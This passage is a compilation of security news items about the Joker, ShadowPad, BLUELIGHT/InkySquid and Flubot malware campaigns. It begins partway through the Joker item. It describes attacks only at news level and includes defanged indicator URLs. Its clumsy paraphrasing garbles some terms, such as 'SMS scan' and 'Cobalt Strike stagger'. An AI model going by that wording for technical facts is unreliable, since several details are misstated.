Initially, apps infected with 'Joker' or another Malware from any of this family committed SMS fraud but soon began to target electronic payments. These two strategies make use of telephone operators' interaction with suppliers to permit service payment via the mobile bill. Both necessitate device authentication but not human verification, allowing them to automate transactions without requiring any user participation. 

In addition, it is typical for all those impacted by 'Joker' to be unaware of the theft unless they thoroughly study their bank statements. It's because the bank does not detect an evidently 'regular' membership and, in general, the charges are so little that they are not noticed as odd movements, therefore the account holder does not even send a traffic notification. 

Furthermore, the malicious applications that the Google Play Store removed upon discovering that they carried the 'Joker' virus are as follows: Auxiliary Message, Element Scanner, Fast Magic SMS, Free Cam Scanner, Go Messages, Super Message, Super SMS, and Travel Wallpapers.

ShadowPad Malware is Being Sold Privately to Chinese Espionage

 

Since 2017, five separate Chinese threat groups have used ShadowPad, an infamous Windows backdoor that allows attackers to download additional harmful modules or steal data. In a detailed overview of the malware, SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said that "adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors," adding that "some threat groups stopped developing their own backdoors after they gained access to ShadowPad." 

ShadowPad was released in 2015 as a replacement for PlugX. However, it wasn't until several well-known supply-chain incidents – CCleaner, NetSarang, and ShadowHammer – that it began to gain considerable public attention. Unlike the publicly available PlugX, ShadowPad is only available to a selected group of people. ShadowPad has been called a "masterpiece of privately sold malware in Chinese espionage" by an American cybersecurity firm. 

ShadowPad is a shellcode-based modular backdoor. A layer of an obfuscated shellcode loader is in charge of decrypting and loading a Root plugin during execution. While the Root plugin's chain of operations decrypts, it loads other shellcode-embedded plugins into memory. To date, at least 22 different plugins have been discovered. 

Additional plugins can be remotely uploaded from the C&C server in addition to the ones included, allowing users to dynamically add functionality that isn't present by default. A Delphi-based controller is in charge of the infected machines, which is used for backdoor communications, upgrading the C2 infrastructure, and controlling the plugins.

"While ShadowPad is well-designed and highly likely to be produced by an experienced malware developer, both its functionalities and its anti-forensics capabilities are under active development," the researchers said. 

ShadowPad-related attacks have lately targeted Hong Kong-based firms as well as key infrastructure in India, Pakistan, and other Central Asian countries. The implant is known to be shared by multiple Chinese espionage actors, including Tick, RedEcho, RedFoxtrot, and clusters dubbed Operation Redbonus, Redkanku, and Fishmonger, although being predominantly attributed to APT41. 

"The threat actor behind Fishmonger is now using it and another backdoor called Spyder as their primary backdoors for long-term monitoring, while they distribute other first-stage backdoors for initial infections including FunnySwitch, BIOPASS RAT, and Cobalt Strike," the researchers said. "The victims include universities, governments, media sector companies, technology companies and health organizations conducting COVID-19 research in Hong Kong, Taiwan, India and the U.S."

Internet Browser Vulnerabilities Exploited by North Korean Hackers to Implant Malware

 

A threat actor from North Korea has indeed been found exploiting two flaws in the Internet Explorer to attack individuals with a specialized implant, targeting a South Korean online daily newspaper as a component of strategic web compromise (SWC). 

Volexity, a cybersecurity firm, has accredited these attacks and operations to a threat actor recognized by the name InkySquid also better known by the monikers ScarCruft and APT37. It is indeed a widely known North Korean hackers' body. Daily NK — the publication of concern, is believed to have been host to the malevolent code from at least the end of March 2021 to early June 2021. 

InkySquid, the infamous North Korean hacker group has been leveraging the vulnerability since 2020 to upload falsified Javascript code that is usually buried within the genuine code in cyberattacks against an Internet Explorer browser. 

However, according to security researchers, earlier in April this year, Volexity identified a suspicious code loaded via www.dailynk[.]com onto unlawful jquery[.]services subdomains. There are two types of URLs identified, which are listed below:

  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 

Further, Volexity experts have noted that the "clever disguise of exploit code amongst legitimate code" as well as the usage of bespoke malware allows attackers to escape detection. 

These attacks involved manipulating the jQuery JavaScript libraries on the website to serve further obscured code from a remote URL and use it to abuse the exploits of two Internet Explorer vulnerabilities that were addressed by Microsoft in August 2020 and March 2021. A Cobalt Strike stagger, as well as the BLUELIGHT new backdoor, have successfully been deployed. 

  • CVE-2020-1380 (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability 
  • CVE-2021-26411 (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability 

It must be mentioned that both the vulnerabilities were actively leveraged in the wild by the North Korean hackers using them to target security scientists working in research and development on vulnerabilities in an operation that was uncovered earlier in January. 

After the timely implementation of the Cobalt Strike, BLUELIGHT is employed as a secondary payload, as a full-featured remote access technique that allows total access to an affected system. 

Along with obtaining system metadata and antivirus product information, malware can execute shellcodes, collect cookies and credentials through Internet Explorer, Microsoft Edge, and Google Chrome browsers, acquire files, and install arbitrary runs that are exfiltrated to a remote server.

Flubot Malware Targets Australians, Spreads Via SMS

 

Muddled phone SMSs and phantom calls attack smartphones in a new wave of hoaxes throughout Australia, including the one that claims a friend's voice message but provides malware that can acquire user personal information. This latest SMS scan, called Flubot, has affected thousands of Australians that intend to implant dangerous malware programs on their smartphones. 

Although the messages could be received by iPhone users as well, Flubot is a sort of virus that targets Android users. It informs the receiver of a missed call or a fresh voicemail and gives the recipient a bogus link to listen to the voice mail. This link leads users to a website that appears like a legitimate brand - maybe Telstra in Australia but it was a packaging provider in Europe. This page asks users to install software to listen to the voice message on their phones. 

It then downloads malware if somehow the user approves. The attacker will gain access to payment card details, private information, SMs intercept, browsing pages, and collect additional information stored on the smartphone if privileges are given for the application. The malware additionally allows the attacker to browse the list of contacts of the user and potentially find new victims. 

Manual solutions are available to eliminate the spyware, although Telstra has recommended users to reset the device with the factory version and to recover the device to a version before the virus was implanted. 

Flubot initially hit Europe earlier this year even before Australians started being inundated with it this month. The Australian Competition and Consumer Commission has informed The Guardian Australia that its Scamwatch Service has gathered over 3700 reports of this exact fraud since the initial report on 04 August. Scamwatch got 413 daily reports on all frauds linked to SMS including Flubot from 4 to 17 August, compared to the 122 received from 01 July to 03 August. 

Delia Rickard, deputy chair of the Australian Competition and Consumer Commission said, “It is flooding the country and it is a really dangerous one.” “We’ve just had one complaint about an instance where the person lost nearly $5000. It appears that the malware has created a fake Google Pay login screen, and the person logged in and then the money disappeared from their account afterward.” 

The finishing touches for fraudsters are cash or personal data, that may subsequently be auctioned on the dark web. Flubot is only one of several frauds in existence that contributes to the pandemic's best year for hackers and cyber thieves. Australians sacrificed almost $850 million to cyber criminals last year, according to ACCC. 

Telstra’s deputy chief information security officer, Clive Reeves, said last week the company was “working with the security community to address this scam”. 

An Optus spokesman said that the business has started contacting impacted consumers. The telecom additionally recommended McAfee Wi-Fi Secure antivirus software to protect consumers linked to wifi connections. 

Another TPG spokeswoman, who manages the Brand Vodafone in Australia, said that last week the firm, including the Flubot scam, has banned over 14m scam SMS. “As scammers constantly morph their tactics, we continually update our filters and mechanisms to catch new scams,” the spokesperson said.